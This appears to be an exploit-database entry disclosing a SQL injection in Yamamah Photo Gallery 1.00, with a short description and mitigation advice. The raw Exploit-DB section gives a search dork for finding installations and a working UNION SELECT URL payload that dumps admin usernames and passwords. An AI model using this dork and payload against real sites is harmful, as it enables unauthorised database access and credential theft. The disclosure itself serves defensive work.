header-logo
Suggest Exploit
vendor:
Yamamah Photo Gallery
by:
CoBRa_21
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Yamamah Photo Gallery
Affected Version From: 1.00
Affected Version To: 1.00
Patch Exists: NO
Related CWE: N/A
CPE: a:yamamah:yamamah_photo_gallery:1.00
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Yamamah Photo Gallery 1.00 SQL Injection Vulnerability

Yamamah Photo Gallery 1.00 is vulnerable to SQL Injection. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to the database and extract sensitive information such as usernames and passwords.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query. Additionally, parameterized queries should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

##################################################################################################

Yamamah Photo Gallery 1.00 SQL Injection Vulnerability

##################################################################################################

Author : CoBRa_21

Script Home : http://www.yamamah.org/

Dork : "Powered By : Yamamah Version 1.00"

##################################################################################################

SQL Injection:

http://localhost/[path]/?calbums=-2 union select 0,1,2,3,4,group_concat(username,0x3a,password),6,7,8,9,10,11,12,13 from admin--

##################################################################################################